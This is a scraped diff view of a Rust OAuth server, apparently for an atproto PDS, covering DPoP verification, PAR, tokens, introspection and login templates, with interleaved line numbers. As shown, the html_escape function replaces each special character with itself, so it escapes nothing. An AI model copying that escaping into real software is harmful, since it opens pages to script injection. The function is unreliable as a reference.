pub async fn check_user_2fa_enabled(pool: &PgPool, did: &str) -> Result<bool, OAuthError> {
133
let row = sqlx::query!(
134
r#"
+20
src/oauth/dpop.rs
···
3
use chrono::Utc;
4
use serde::{Deserialize, Serialize};
5
use sha2::{Digest, Sha256};
6
use super::OAuthError;
7
const DPOP_NONCE_VALIDITY_SECS: i64 = 300;
8
const DPOP_MAX_AGE_SECS: i64 = 300;
9
#[derive(Debug, Clone)]
10
pub struct DPoPVerifyResult {
11
pub jkt: String,
12
pub jti: String,
13
}
14
#[derive(Debug, Clone, Serialize, Deserialize)]
15
pub struct DPoPProofHeader {
16
pub typ: String,
17
pub alg: String,
18
pub jwk: DPoPJwk,
19
}
20
#[derive(Debug, Clone, Serialize, Deserialize)]
21
pub struct DPoPJwk {
22
pub kty: String,
···
27
#[serde(skip_serializing_if = "Option::is_none")]
28
pub y: Option<String>,
29
}
30
#[derive(Debug, Clone, Serialize, Deserialize)]
31
pub struct DPoPProofPayload {
32
pub jti: String,
···
38
#[serde(skip_serializing_if = "Option::is_none")]
39
pub nonce: Option<String>,
40
}
41
pub struct DPoPVerifier {
42
secret: Vec<u8>,
43
}
44
impl DPoPVerifier {
45
pub fn new(secret: &[u8]) -> Self {
46
Self {
47
secret: secret.to_vec(),
48
}
49
}
50
pub fn generate_nonce(&self) -> String {
51
let timestamp = Utc::now().timestamp();
52
let timestamp_bytes = timestamp.to_be_bytes();
···
59
nonce_data.extend_from_slice(&hash[..16]);
60
URL_SAFE_NO_PAD.encode(&nonce_data)
61
}
62
pub fn validate_nonce(&self, nonce: &str) -> Result<(), OAuthError> {
63
let nonce_bytes = URL_SAFE_NO_PAD
64
.decode(nonce)
···
83
}
84
Ok(())
85
}
86
pub fn verify_proof(
87
&self,
88
dpop_header: &str,
···
152
})
153
}
154
}
155
fn verify_dpop_signature(
156
alg: &str,
157
jwk: &DPoPJwk,
···
168
))),
169
}
170
}
171
fn verify_es256(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> {
172
use p256::ecdsa::signature::Verifier;
173
use p256::ecdsa::{Signature, VerifyingKey};
···
208
.verify(message, &sig)
209
.map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string()))
210
}
211
fn verify_es384(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> {
212
use p384::ecdsa::signature::Verifier;
213
use p384::ecdsa::{Signature, VerifyingKey};
···
248
.verify(message, &sig)
249
.map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string()))
250
}
251
fn verify_eddsa(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> {
252
use ed25519_dalek::{Signature, VerifyingKey};
253
let crv = jwk.crv.as_ref().ok_or_else(|| {
···
277
.verify_strict(message, &sig)
278
.map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string()))
279
}
280
pub fn compute_jwk_thumbprint(jwk: &DPoPJwk) -> Result<String, OAuthError> {
281
let canonical = match jwk.kty.as_str() {
282
"EC" => {
···
319
let hash = hasher.finalize();
320
Ok(URL_SAFE_NO_PAD.encode(&hash))
321
}
322
pub fn compute_access_token_hash(access_token: &str) -> String {
323
let mut hasher = Sha256::new();
324
hasher.update(access_token.as_bytes());
325
let hash = hasher.finalize();
326
URL_SAFE_NO_PAD.encode(&hash)
327
}
328
#[cfg(test)]
329
mod tests {
330
use super::*;
331
#[test]
332
fn test_nonce_generation_and_validation() {
333
let secret = b"test-secret-key-32-bytes-long!!!";
···
335
let nonce = verifier.generate_nonce();
336
assert!(verifier.validate_nonce(&nonce).is_ok());
337
}
338
#[test]
339
fn test_jwk_thumbprint_ec() {
340
let jwk = DPoPJwk {
···
3
use chrono::Utc;
4
use serde::{Deserialize, Serialize};
5
use sha2::{Digest, Sha256};
6
+
7
use super::OAuthError;
8
+
9
const DPOP_NONCE_VALIDITY_SECS: i64 = 300;
10
const DPOP_MAX_AGE_SECS: i64 = 300;
11
+
12
#[derive(Debug, Clone)]
13
pub struct DPoPVerifyResult {
14
pub jkt: String,
15
pub jti: String,
16
}
17
+
18
#[derive(Debug, Clone, Serialize, Deserialize)]
19
pub struct DPoPProofHeader {
20
pub typ: String,
21
pub alg: String,
22
pub jwk: DPoPJwk,
23
}
24
+
25
#[derive(Debug, Clone, Serialize, Deserialize)]
26
pub struct DPoPJwk {
27
pub kty: String,
···
32
#[serde(skip_serializing_if = "Option::is_none")]
33
pub y: Option<String>,
34
}
35
+
36
#[derive(Debug, Clone, Serialize, Deserialize)]
37
pub struct DPoPProofPayload {
38
pub jti: String,
···
44
#[serde(skip_serializing_if = "Option::is_none")]
45
pub nonce: Option<String>,
46
}
47
+
48
pub struct DPoPVerifier {
49
secret: Vec<u8>,
50
}
51
+
52
impl DPoPVerifier {
53
pub fn new(secret: &[u8]) -> Self {
54
Self {
55
secret: secret.to_vec(),
56
}
57
}
58
+
59
pub fn generate_nonce(&self) -> String {
60
let timestamp = Utc::now().timestamp();
61
let timestamp_bytes = timestamp.to_be_bytes();
···
68
nonce_data.extend_from_slice(&hash[..16]);
69
URL_SAFE_NO_PAD.encode(&nonce_data)
70
}
71
+
72
pub fn validate_nonce(&self, nonce: &str) -> Result<(), OAuthError> {
73
let nonce_bytes = URL_SAFE_NO_PAD
74
.decode(nonce)
···
93
}
94
Ok(())
95
}
96
+
97
pub fn verify_proof(
98
&self,
99
dpop_header: &str,
···
163
})
164
}
165
}
166
+
167
fn verify_dpop_signature(
168
alg: &str,
169
jwk: &DPoPJwk,
···
180
))),
181
}
182
}
183
+
184
fn verify_es256(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> {
185
use p256::ecdsa::signature::Verifier;
186
use p256::ecdsa::{Signature, VerifyingKey};
···
221
.verify(message, &sig)
222
.map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string()))
223
}
224
+
225
fn verify_es384(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> {
226
use p384::ecdsa::signature::Verifier;
227
use p384::ecdsa::{Signature, VerifyingKey};
···
262
.verify(message, &sig)
263
.map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string()))
264
}
265
+
266
fn verify_eddsa(jwk: &DPoPJwk, message: &[u8], signature: &[u8]) -> Result<(), OAuthError> {
267
use ed25519_dalek::{Signature, VerifyingKey};
268
let crv = jwk.crv.as_ref().ok_or_else(|| {
···
292
.verify_strict(message, &sig)
293
.map_err(|_| OAuthError::InvalidDpopProof("Signature verification failed".to_string()))
294
}
295
+
296
pub fn compute_jwk_thumbprint(jwk: &DPoPJwk) -> Result<String, OAuthError> {
297
let canonical = match jwk.kty.as_str() {
298
"EC" => {
···
335
let hash = hasher.finalize();
336
Ok(URL_SAFE_NO_PAD.encode(&hash))
337
}
338
+
339
pub fn compute_access_token_hash(access_token: &str) -> String {
340
let mut hasher = Sha256::new();
341
hasher.update(access_token.as_bytes());
342
let hash = hasher.finalize();
343
URL_SAFE_NO_PAD.encode(&hash)
344
}
345
+
346
#[cfg(test)]
347
mod tests {
348
use super::*;
349
+
350
#[test]
351
fn test_nonce_generation_and_validation() {
352
let secret = b"test-secret-key-32-bytes-long!!!";
···
354
let nonce = verifier.generate_nonce();
355
assert!(verifier.validate_nonce(&nonce).is_ok());
356
}
357
+
358
#[test]
359
fn test_jwk_thumbprint_ec() {
360
let jwk = DPoPJwk {
+5
src/oauth/endpoints/metadata.rs
···
2
use serde::{Deserialize, Serialize};
3
use crate::state::AppState;
4
use crate::oauth::jwks::{JwkSet, create_jwk_set};
5
#[derive(Debug, Serialize, Deserialize)]
6
pub struct ProtectedResourceMetadata {
7
pub resource: String,
···
11
#[serde(skip_serializing_if = "Option::is_none")]
12
pub resource_documentation: Option<String>,
13
}
14
#[derive(Debug, Serialize, Deserialize)]
15
pub struct AuthorizationServerMetadata {
16
pub issuer: String,
···
43
#[serde(skip_serializing_if = "Option::is_none")]
44
pub introspection_endpoint: Option<String>,
45
}
46
pub async fn oauth_protected_resource(
47
State(_state): State<AppState>,
48
) -> Json<ProtectedResourceMetadata> {
···
56
resource_documentation: Some("https://atproto.com".to_string()),
57
})
58
}
59
pub async fn oauth_authorization_server(
60
State(_state): State<AppState>,
61
) -> Json<AuthorizationServerMetadata> {
···
96
introspection_endpoint: Some(format!("{}/oauth/introspect", issuer)),
97
})
98
}
99
pub async fn oauth_jwks(State(_state): State<AppState>) -> Json<JwkSet> {
100
use crate::config::AuthConfig;
101
use crate::oauth::jwks::Jwk;
···
2
use serde::{Deserialize, Serialize};
3
use crate::state::AppState;
4
use crate::oauth::jwks::{JwkSet, create_jwk_set};
5
+
6
#[derive(Debug, Serialize, Deserialize)]
7
pub struct ProtectedResourceMetadata {
8
pub resource: String,
···
12
#[serde(skip_serializing_if = "Option::is_none")]
13
pub resource_documentation: Option<String>,
14
}
15
+
16
#[derive(Debug, Serialize, Deserialize)]
17
pub struct AuthorizationServerMetadata {
18
pub issuer: String,
···
45
#[serde(skip_serializing_if = "Option::is_none")]
46
pub introspection_endpoint: Option<String>,
47
}
48
+
49
pub async fn oauth_protected_resource(
50
State(_state): State<AppState>,
51
) -> Json<ProtectedResourceMetadata> {
···
59
resource_documentation: Some("https://atproto.com".to_string()),
60
})
61
}
62
+
63
pub async fn oauth_authorization_server(
64
State(_state): State<AppState>,
65
) -> Json<AuthorizationServerMetadata> {
···
100
introspection_endpoint: Some(format!("{}/oauth/introspect", issuer)),
101
})
102
}
103
+
104
pub async fn oauth_jwks(State(_state): State<AppState>) -> Json<JwkSet> {
105
use crate::config::AuthConfig;
106
use crate::oauth::jwks::Jwk;
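Note on wiring: the metadata handlers above are ordinary axum handlers returning Json, so exposing them is only a matter of route registration. A minimal sketch follows; the discovery paths and the module import paths are assumptions for illustration (this PR's actual router changes are not shown here):

use axum::{routing::get, Router};

use crate::oauth::endpoints::metadata::{
    oauth_authorization_server, oauth_jwks, oauth_protected_resource,
};
use crate::state::AppState;

// Hypothetical wiring; RFC 8414-style well-known paths assumed, and the jwks
// path is a guess rather than something visible in this diff.
fn metadata_routes() -> Router<AppState> {
    Router::new()
        .route("/.well-known/oauth-authorization-server", get(oauth_authorization_server))
        .route("/.well-known/oauth-protected-resource", get(oauth_protected_resource))
        .route("/oauth/jwks", get(oauth_jwks))
}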
+1
src/oauth/endpoints/mod.rs
+6
src/oauth/endpoints/par.rs
···
11
client::ClientMetadataCache,
12
db,
13
};
14
const PAR_EXPIRY_SECONDS: i64 = 600;
15
const SUPPORTED_SCOPES: &[&str] = &["atproto", "transition:generic", "transition:chat.bsky"];
16
#[derive(Debug, Deserialize)]
17
pub struct ParRequest {
18
pub response_type: String,
···
37
#[serde(default)]
38
pub client_assertion_type: Option<String>,
39
}
40
#[derive(Debug, Serialize)]
41
pub struct ParResponse {
42
pub request_uri: String,
43
pub expires_in: u64,
44
}
45
pub async fn pushed_authorization_request(
46
State(state): State<AppState>,
47
headers: HeaderMap,
···
115
expires_in: PAR_EXPIRY_SECONDS as u64,
116
}))
117
}
118
fn determine_client_auth(request: &ParRequest) -> Result<ClientAuth, OAuthError> {
119
if let (Some(assertion), Some(assertion_type)) =
120
(&request.client_assertion, &request.client_assertion_type)
···
135
}
136
Ok(ClientAuth::None)
137
}
138
fn validate_scope(
139
requested_scope: &Option<String>,
140
client_metadata: &crate::oauth::client::ClientMetadata,
···
11
client::ClientMetadataCache,
12
db,
13
};
14
+
15
const PAR_EXPIRY_SECONDS: i64 = 600;
16
const SUPPORTED_SCOPES: &[&str] = &["atproto", "transition:generic", "transition:chat.bsky"];
17
+
18
#[derive(Debug, Deserialize)]
19
pub struct ParRequest {
20
pub response_type: String,
···
39
#[serde(default)]
40
pub client_assertion_type: Option<String>,
41
}
42
+
43
#[derive(Debug, Serialize)]
44
pub struct ParResponse {
45
pub request_uri: String,
46
pub expires_in: u64,
47
}
48
+
49
pub async fn pushed_authorization_request(
50
State(state): State<AppState>,
51
headers: HeaderMap,
···
119
expires_in: PAR_EXPIRY_SECONDS as u64,
120
}))
121
}
122
+
123
fn determine_client_auth(request: &ParRequest) -> Result<ClientAuth, OAuthError> {
124
if let (Some(assertion), Some(assertion_type)) =
125
(&request.client_assertion, &request.client_assertion_type)
···
140
}
141
Ok(ClientAuth::None)
142
}
143
+
144
fn validate_scope(
145
requested_scope: &Option<String>,
146
client_metadata: &crate::oauth::client::ClientMetadata,
+3
src/oauth/endpoints/token/grants.rs
···
11
};
12
use super::types::{TokenRequest, TokenResponse};
13
use super::helpers::{create_access_token, verify_pkce};
14
const ACCESS_TOKEN_EXPIRY_SECONDS: i64 = 3600;
15
const REFRESH_TOKEN_EXPIRY_DAYS: i64 = 60;
16
pub async fn handle_authorization_code_grant(
17
state: AppState,
18
_headers: HeaderMap,
···
125
}),
126
))
127
}
128
pub async fn handle_refresh_token_grant(
129
state: AppState,
130
_headers: HeaderMap,
···
11
};
12
use super::types::{TokenRequest, TokenResponse};
13
use super::helpers::{create_access_token, verify_pkce};
14
+
15
const ACCESS_TOKEN_EXPIRY_SECONDS: i64 = 3600;
16
const REFRESH_TOKEN_EXPIRY_DAYS: i64 = 60;
17
+
18
pub async fn handle_authorization_code_grant(
19
state: AppState,
20
_headers: HeaderMap,
···
127
}),
128
))
129
}
130
+
131
pub async fn handle_refresh_token_grant(
132
state: AppState,
133
_headers: HeaderMap,
+5
src/oauth/endpoints/token/helpers.rs
···
6
use subtle::ConstantTimeEq;
7
use crate::config::AuthConfig;
8
use crate::oauth::OAuthError;
9
const ACCESS_TOKEN_EXPIRY_SECONDS: i64 = 3600;
10
pub struct TokenClaims {
11
pub jti: String,
12
pub exp: i64,
13
pub iat: i64,
14
}
15
pub fn verify_pkce(code_challenge: &str, code_verifier: &str) -> Result<(), OAuthError> {
16
let mut hasher = Sha256::new();
17
hasher.update(code_verifier.as_bytes());
···
22
}
23
Ok(())
24
}
25
pub fn create_access_token(
26
token_id: &str,
27
sub: &str,
···
60
let signature_b64 = URL_SAFE_NO_PAD.encode(&signature);
61
Ok(format!("{}.{}", signing_input, signature_b64))
62
}
63
pub fn extract_token_claims(token: &str) -> Result<TokenClaims, OAuthError> {
64
let parts: Vec<&str> = token.split('.').collect();
65
if parts.len() != 3 {
···
6
use subtle::ConstantTimeEq;
7
use crate::config::AuthConfig;
8
use crate::oauth::OAuthError;
9
+
10
const ACCESS_TOKEN_EXPIRY_SECONDS: i64 = 3600;
11
+
12
pub struct TokenClaims {
13
pub jti: String,
14
pub exp: i64,
15
pub iat: i64,
16
}
17
+
18
pub fn verify_pkce(code_challenge: &str, code_verifier: &str) -> Result<(), OAuthError> {
19
let mut hasher = Sha256::new();
20
hasher.update(code_verifier.as_bytes());
···
25
}
26
Ok(())
27
}
28
+
29
pub fn create_access_token(
30
token_id: &str,
31
sub: &str,
···
64
let signature_b64 = URL_SAFE_NO_PAD.encode(&signature);
65
Ok(format!("{}.{}", signing_input, signature_b64))
66
}
67
+
68
pub fn extract_token_claims(token: &str) -> Result<TokenClaims, OAuthError> {
69
let parts: Vec<&str> = token.split('.').collect();
70
if parts.len() != 3 {
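A companion sketch for verify_pkce above: the server re-hashes the submitted code_verifier and compares it against the stored code_challenge (the comparison sits in the elided lines, presumably via the ConstantTimeEq import at the top of the file), which matches the standard S256 transform. Assuming the same sha2 and base64 crates already used in this diff, the client-side half would look roughly like this; make_code_challenge is a hypothetical helper name, not part of the change:

use base64::engine::general_purpose::URL_SAFE_NO_PAD;
use base64::Engine;
use sha2::{Digest, Sha256};

// Hypothetical client-side helper: the challenge sent with the authorization
// request is base64url(SHA-256(code_verifier)) without padding, so the
// verify_pkce check above succeeds when the same verifier is later presented
// at the token endpoint.
fn make_code_challenge(code_verifier: &str) -> String {
    let mut hasher = Sha256::new();
    hasher.update(code_verifier.as_bytes());
    URL_SAFE_NO_PAD.encode(hasher.finalize())
}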
+5
src/oauth/endpoints/token/introspect.rs
···
6
use crate::state::{AppState, RateLimitKind};
7
use crate::oauth::{OAuthError, db};
8
use super::helpers::extract_token_claims;
9
#[derive(Debug, Deserialize)]
10
pub struct RevokeRequest {
11
pub token: Option<String>,
12
#[serde(default)]
13
pub token_type_hint: Option<String>,
14
}
15
pub async fn revoke_token(
16
State(state): State<AppState>,
17
headers: HeaderMap,
···
31
}
32
Ok(StatusCode::OK)
33
}
34
#[derive(Debug, Deserialize)]
35
pub struct IntrospectRequest {
36
pub token: String,
37
#[serde(default)]
38
pub token_type_hint: Option<String>,
39
}
40
#[derive(Debug, Serialize)]
41
pub struct IntrospectResponse {
42
pub active: bool,
···
63
#[serde(skip_serializing_if = "Option::is_none")]
64
pub jti: Option<String>,
65
}
66
pub async fn introspect_token(
67
State(state): State<AppState>,
68
headers: HeaderMap,
···
6
use crate::state::{AppState, RateLimitKind};
7
use crate::oauth::{OAuthError, db};
8
use super::helpers::extract_token_claims;
9
+
10
#[derive(Debug, Deserialize)]
11
pub struct RevokeRequest {
12
pub token: Option<String>,
13
#[serde(default)]
14
pub token_type_hint: Option<String>,
15
}
16
+
17
pub async fn revoke_token(
18
State(state): State<AppState>,
19
headers: HeaderMap,
···
33
}
34
Ok(StatusCode::OK)
35
}
36
+
37
#[derive(Debug, Deserialize)]
38
pub struct IntrospectRequest {
39
pub token: String,
40
#[serde(default)]
41
pub token_type_hint: Option<String>,
42
}
43
+
44
#[derive(Debug, Serialize)]
45
pub struct IntrospectResponse {
46
pub active: bool,
···
67
#[serde(skip_serializing_if = "Option::is_none")]
68
pub jti: Option<String>,
69
}
70
+
71
pub async fn introspect_token(
72
State(state): State<AppState>,
73
headers: HeaderMap,
+4
src/oauth/endpoints/token/mod.rs
···
2
mod helpers;
3
mod introspect;
4
mod types;
5
use axum::{
6
Form, Json,
7
extract::State,
···
9
};
10
use crate::state::{AppState, RateLimitKind};
11
use crate::oauth::OAuthError;
12
pub use grants::{handle_authorization_code_grant, handle_refresh_token_grant};
13
pub use helpers::{create_access_token, extract_token_claims, verify_pkce, TokenClaims};
14
pub use introspect::{
15
introspect_token, revoke_token, IntrospectRequest, IntrospectResponse, RevokeRequest,
16
};
17
pub use types::{TokenRequest, TokenResponse};
18
fn extract_client_ip(headers: &HeaderMap) -> String {
19
if let Some(forwarded) = headers.get("x-forwarded-for") {
20
if let Ok(value) = forwarded.to_str() {
···
30
}
31
"unknown".to_string()
32
}
33
pub async fn token_endpoint(
34
State(state): State<AppState>,
35
headers: HeaderMap,
···
2
mod helpers;
3
mod introspect;
4
mod types;
5
+
6
use axum::{
7
Form, Json,
8
extract::State,
···
10
};
11
use crate::state::{AppState, RateLimitKind};
12
use crate::oauth::OAuthError;
13
+
14
pub use grants::{handle_authorization_code_grant, handle_refresh_token_grant};
15
pub use helpers::{create_access_token, extract_token_claims, verify_pkce, TokenClaims};
16
pub use introspect::{
17
introspect_token, revoke_token, IntrospectRequest, IntrospectResponse, RevokeRequest,
18
};
19
pub use types::{TokenRequest, TokenResponse};
20
+
21
fn extract_client_ip(headers: &HeaderMap) -> String {
22
if let Some(forwarded) = headers.get("x-forwarded-for") {
23
if let Ok(value) = forwarded.to_str() {
···
33
}
34
"unknown".to_string()
35
}
36
+
37
pub async fn token_endpoint(
38
State(state): State<AppState>,
39
headers: HeaderMap,
+2
src/oauth/endpoints/token/types.rs
···
1
use serde::{Deserialize, Serialize};
2
+
3
#[derive(Debug, Deserialize)]
4
pub struct TokenRequest {
5
pub grant_type: String,
···
20
#[serde(default)]
21
pub client_assertion_type: Option<String>,
22
}
23
+
24
#[derive(Debug, Serialize)]
25
pub struct TokenResponse {
26
pub access_token: String,
+5
src/oauth/error.rs
···
4
response::{IntoResponse, Response},
5
};
6
use serde::Serialize;
7
#[derive(Debug)]
8
pub enum OAuthError {
9
InvalidRequest(String),
···
20
InvalidToken(String),
21
RateLimited,
22
}
23
#[derive(Serialize)]
24
struct OAuthErrorResponse {
25
error: String,
26
error_description: Option<String>,
27
}
28
impl IntoResponse for OAuthError {
29
fn into_response(self) -> Response {
30
let (status, error, description) = match self {
···
86
.into_response()
87
}
88
}
89
impl From<sqlx::Error> for OAuthError {
90
fn from(err: sqlx::Error) -> Self {
91
tracing::error!("Database error in OAuth flow: {}", err);
92
OAuthError::ServerError("An internal error occurred".to_string())
93
}
94
}
95
impl From<anyhow::Error> for OAuthError {
96
fn from(err: anyhow::Error) -> Self {
97
tracing::error!("Internal error in OAuth flow: {}", err);
···
4
response::{IntoResponse, Response},
5
};
6
use serde::Serialize;
7
+
8
#[derive(Debug)]
9
pub enum OAuthError {
10
InvalidRequest(String),
···
21
InvalidToken(String),
22
RateLimited,
23
}
24
+
25
#[derive(Serialize)]
26
struct OAuthErrorResponse {
27
error: String,
28
error_description: Option<String>,
29
}
30
+
31
impl IntoResponse for OAuthError {
32
fn into_response(self) -> Response {
33
let (status, error, description) = match self {
···
89
.into_response()
90
}
91
}
92
+
93
impl From<sqlx::Error> for OAuthError {
94
fn from(err: sqlx::Error) -> Self {
95
tracing::error!("Database error in OAuth flow: {}", err);
96
OAuthError::ServerError("An internal error occurred".to_string())
97
}
98
}
99
+
100
impl From<anyhow::Error> for OAuthError {
101
fn from(err: anyhow::Error) -> Self {
102
tracing::error!("Internal error in OAuth flow: {}", err);
+3
src/oauth/jwks.rs
···
1
use serde::{Deserialize, Serialize};
2
#[derive(Debug, Clone, Serialize, Deserialize)]
3
pub struct JwkSet {
4
pub keys: Vec<Jwk>,
5
}
6
#[derive(Debug, Clone, Serialize, Deserialize)]
7
pub struct Jwk {
8
pub kty: String,
···
19
#[serde(skip_serializing_if = "Option::is_none")]
20
pub y: Option<String>,
21
}
22
pub fn create_jwk_set(keys: Vec<Jwk>) -> JwkSet {
23
JwkSet { keys }
24
}
···
1
use serde::{Deserialize, Serialize};
2
+
3
#[derive(Debug, Clone, Serialize, Deserialize)]
4
pub struct JwkSet {
5
pub keys: Vec<Jwk>,
6
}
7
+
8
#[derive(Debug, Clone, Serialize, Deserialize)]
9
pub struct Jwk {
10
pub kty: String,
···
21
#[serde(skip_serializing_if = "Option::is_none")]
22
pub y: Option<String>,
23
}
24
+
25
pub fn create_jwk_set(keys: Vec<Jwk>) -> JwkSet {
26
JwkSet { keys }
27
}
+1
src/oauth/mod.rs
+10
src/oauth/templates.rs
···
1
use chrono::{DateTime, Utc};
2
fn base_styles() -> &'static str {
3
r#"
4
:root {
···
340
}
341
"#
342
}
343
pub fn login_page(
344
client_id: &str,
345
client_name: Option<&str>,
···
411
login_hint_value = html_escape(login_hint_value),
412
)
413
}
414
pub struct DeviceAccount {
415
pub did: String,
416
pub handle: String,
417
pub email: Option<String>,
418
pub last_used_at: DateTime<Utc>,
419
}
420
pub fn account_selector_page(
421
client_id: &str,
422
client_name: Option<&str>,
···
482
request_uri_encoded = urlencoding::encode(request_uri),
483
)
484
}
485
pub fn two_factor_page(
486
request_uri: &str,
487
channel: &str,
···
539
error_html = error_html,
540
)
541
}
542
pub fn error_page(error: &str, error_description: Option<&str>) -> String {
543
let description = error_description.unwrap_or("An error occurred during the authorization process.");
544
format!(
···
570
description = html_escape(description),
571
)
572
}
573
pub fn success_page(client_name: Option<&str>) -> String {
574
let client_display = client_name.unwrap_or("The application");
575
format!(
···
597
client_display = html_escape(client_display),
598
)
599
}
600
fn html_escape(s: &str) -> String {
601
s.replace('&', "&")
602
.replace('<', "<")
···
604
.replace('"', """)
605
.replace('\'', "'")
606
}
607
fn get_initials(handle: &str) -> String {
608
let clean = handle.trim_start_matches('@');
609
if clean.is_empty() {
···
611
}
612
clean.chars().next().unwrap_or('?').to_uppercase().to_string()
613
}
614
pub fn mask_email(email: &str) -> String {
615
if let Some(at_pos) = email.find('@') {
616
let local = &email[..at_pos];
···
1
use chrono::{DateTime, Utc};
2
+
3
fn base_styles() -> &'static str {
4
r#"
5
:root {
···
341
}
342
"#
343
}
344
+
345
pub fn login_page(
346
client_id: &str,
347
client_name: Option<&str>,
···
413
login_hint_value = html_escape(login_hint_value),
414
)
415
}
416
+
417
pub struct DeviceAccount {
418
pub did: String,
419
pub handle: String,
420
pub email: Option<String>,
421
pub last_used_at: DateTime<Utc>,
422
}
423
+
424
pub fn account_selector_page(
425
client_id: &str,
426
client_name: Option<&str>,
···
486
request_uri_encoded = urlencoding::encode(request_uri),
487
)
488
}
489
+
490
pub fn two_factor_page(
491
request_uri: &str,
492
channel: &str,
···
544
error_html = error_html,
545
)
546
}
547
+
548
pub fn error_page(error: &str, error_description: Option<&str>) -> String {
549
let description = error_description.unwrap_or("An error occurred during the authorization process.");
550
format!(
···
576
description = html_escape(description),
577
)
578
}
579
+
580
pub fn success_page(client_name: Option<&str>) -> String {
581
let client_display = client_name.unwrap_or("The application");
582
format!(
···
604
client_display = html_escape(client_display),
605
)
606
}
607
+
608
fn html_escape(s: &str) -> String {
609
s.replace('&', "&")
610
.replace('<', "<")
···
612
.replace('"', """)
613
.replace('\'', "'")
614
}
615
+
616
fn get_initials(handle: &str) -> String {
617
let clean = handle.trim_start_matches('@');
618
if clean.is_empty() {
···
620
}
621
clean.chars().next().unwrap_or('?').to_uppercase().to_string()
622
}
623
+
624
pub fn mask_email(email: &str) -> String {
625
if let Some(at_pos) = email.find('@') {
626
let local = &email[..at_pos];
+27
src/oauth/types.rs
···
1
use chrono::{DateTime, Utc};
2
use serde::{Deserialize, Serialize};
3
use serde_json::Value as JsonValue;
4
#[derive(Debug, Clone, Serialize, Deserialize)]
5
pub struct RequestId(pub String);
6
#[derive(Debug, Clone, Serialize, Deserialize)]
7
pub struct TokenId(pub String);
8
#[derive(Debug, Clone, Serialize, Deserialize)]
9
pub struct DeviceId(pub String);
10
#[derive(Debug, Clone, Serialize, Deserialize)]
11
pub struct SessionId(pub String);
12
#[derive(Debug, Clone, Serialize, Deserialize)]
13
pub struct Code(pub String);
14
#[derive(Debug, Clone, Serialize, Deserialize)]
15
pub struct RefreshToken(pub String);
16
impl RequestId {
17
pub fn generate() -> Self {
18
Self(format!("urn:ietf:params:oauth:request_uri:{}", uuid::Uuid::new_v4()))
19
}
20
}
21
impl TokenId {
22
pub fn generate() -> Self {
23
Self(uuid::Uuid::new_v4().to_string())
24
}
25
}
26
impl DeviceId {
27
pub fn generate() -> Self {
28
Self(uuid::Uuid::new_v4().to_string())
29
}
30
}
31
impl SessionId {
32
pub fn generate() -> Self {
33
Self(uuid::Uuid::new_v4().to_string())
34
}
35
}
36
impl Code {
37
pub fn generate() -> Self {
38
use rand::Rng;
···
43
))
44
}
45
}
46
impl RefreshToken {
47
pub fn generate() -> Self {
48
use rand::Rng;
···
53
))
54
}
55
}
56
#[derive(Debug, Clone, Serialize, Deserialize)]
57
#[serde(tag = "method")]
58
pub enum ClientAuth {
···
65
#[serde(rename = "private_key_jwt")]
66
PrivateKeyJwt { client_assertion: String },
67
}
68
#[derive(Debug, Clone, Serialize, Deserialize)]
69
pub struct AuthorizationRequestParameters {
70
pub response_type: String,
···
79
#[serde(flatten)]
80
pub extra: Option<JsonValue>,
81
}
82
#[derive(Debug, Clone)]
83
pub struct RequestData {
84
pub client_id: String,
···
89
pub device_id: Option<String>,
90
pub code: Option<String>,
91
}
92
#[derive(Debug, Clone)]
93
pub struct DeviceData {
94
pub session_id: String,
···
96
pub ip_address: String,
97
pub last_seen_at: DateTime<Utc>,
98
}
99
#[derive(Debug, Clone)]
100
pub struct TokenData {
101
pub did: String,
···
112
pub current_refresh_token: Option<String>,
113
pub scope: Option<String>,
114
}
115
#[derive(Debug, Clone, Serialize, Deserialize)]
116
pub struct AuthorizedClientData {
117
pub scope: Option<String>,
118
pub remember: bool,
119
}
120
#[derive(Debug, Clone, Serialize, Deserialize)]
121
pub struct OAuthClientMetadata {
122
pub client_id: String,
···
133
pub jwks_uri: Option<String>,
134
pub application_type: Option<String>,
135
}
136
#[derive(Debug, Clone, Serialize, Deserialize)]
137
pub struct ProtectedResourceMetadata {
138
pub resource: String,
···
141
pub scopes_supported: Vec<String>,
142
pub resource_documentation: Option<String>,
143
}
144
#[derive(Debug, Clone, Serialize, Deserialize)]
145
pub struct AuthorizationServerMetadata {
146
pub issuer: String,
···
159
pub dpop_signing_alg_values_supported: Option<Vec<String>>,
160
pub authorization_response_iss_parameter_supported: Option<bool>,
161
}
162
#[derive(Debug, Clone, Serialize, Deserialize)]
163
pub struct ParResponse {
164
pub request_uri: String,
165
pub expires_in: u64,
166
}
167
#[derive(Debug, Clone, Serialize, Deserialize)]
168
pub struct TokenResponse {
169
pub access_token: String,
···
176
#[serde(skip_serializing_if = "Option::is_none")]
177
pub sub: Option<String>,
178
}
179
#[derive(Debug, Clone, Serialize, Deserialize)]
180
pub struct TokenRequest {
181
pub grant_type: String,
···
186
pub client_id: Option<String>,
187
pub client_secret: Option<String>,
188
}
189
#[derive(Debug, Clone, Serialize, Deserialize)]
190
pub struct DPoPClaims {
191
pub jti: String,
···
197
#[serde(skip_serializing_if = "Option::is_none")]
198
pub nonce: Option<String>,
199
}
200
#[derive(Debug, Clone, Serialize, Deserialize)]
201
pub struct JwkPublicKey {
202
pub kty: String,
···
208
pub kid: Option<String>,
209
pub alg: Option<String>,
210
}
211
#[derive(Debug, Clone, Serialize, Deserialize)]
212
pub struct Jwks {
213
pub keys: Vec<JwkPublicKey>,
···
1
use chrono::{DateTime, Utc};
2
use serde::{Deserialize, Serialize};
3
use serde_json::Value as JsonValue;
4
+
5
#[derive(Debug, Clone, Serialize, Deserialize)]
6
pub struct RequestId(pub String);
7
+
8
#[derive(Debug, Clone, Serialize, Deserialize)]
9
pub struct TokenId(pub String);
10
+
11
#[derive(Debug, Clone, Serialize, Deserialize)]
12
pub struct DeviceId(pub String);
13
+
14
#[derive(Debug, Clone, Serialize, Deserialize)]
15
